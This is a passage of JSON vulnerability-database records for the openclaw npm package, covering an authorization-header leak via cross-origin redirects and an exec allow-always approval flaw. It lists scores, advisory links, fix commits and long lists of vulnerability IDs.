change.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32913","reference_id":"","reference_type":"","scores":[{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.14121","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.14157","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.14154","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32913"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/46715371b0612a6f9114dffd1466941ac476cef5","reference_id":"","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-24T13:45:01Z/"}],"url":"https://github.com/openclaw/openclaw/commit/46715371b0612a6f9114dffd1466941ac476cef5"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7","reference_id":"","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7"},{"reference_url":"https://vulncheck.com/advisories/openclaw-mar-custom-authorization-header-leakage-via-cross-origin-redirects","reference_id":"","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-24T13:45:01Z/"}],"url":"https://vulncheck.com/advisories/openclaw-mar-custom-authorization-header-leakage-via-cross-origin-redirects"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32913","reference_id":"CVE-2026-32913","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32913"},{"reference_url":"https://github.com/advisories/GHSA-6mgf-v5j7-45cr","reference_id":"GHSA-6mgf-v5j7-45cr","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6mgf-v5j7-45cr"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6mgf-v5j7-45cr","reference_id":"GHSA-6mgf-v5j7-45cr","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-24T13:45:01Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6mgf-v5j7-45cr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74554?format=json","purl":"pkg:npm/openclaw@2026.3.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.7"}],"aliases":["CVE-2026-32913","GHSA-6mgf-v5j7-45cr"],"risk_score":4.2,"exploitability":"0.5","weighted_severity":"8.4","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jad8-5duz-dqg1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89044?format=json","vulnerability_id":"VCID-jbwa-scg3-efeq","summary":"OpenClaw gateway exec allow-always over-trusts positional carrier executables\n## Summary\n\nAllow-always persistence could trust wrapper carrier executables instead of the actual invoked target when commands were routed through dispatch wrappers.\n\n## Impact\n\nA one-time approval could persist a broader future allowlist entry than the operator intended, weakening execution approval boundaries.\n\n## Affected Component\n\n`src/infra/exec-approvals-allowlist.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `9ec44fad39` (`Exec approvals: reject wrapper carrier allow-always targets`).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41380","reference_id":"","reference_type":"","scores":[{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.08327","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.08321","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.08339","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41380"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/9ec44fad390f0bc1c29c3cc418b322560cb0222b","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/9ec44fad390f0bc1c29c3cc418b322560cb0222b"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.28","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.28"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-p4x4-2r7f-wjxg","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-p4x4-2r7f-wjxg"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41380","reference_id":"CVE-2026-41380","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41380"},{"reference_url":"https://github.com/advisories/GHSA-p4x4-2r7f-wjxg","reference_id":"GHSA-p4x4-2r7f-wjxg","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-p4x4-2r7f-wjxg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vu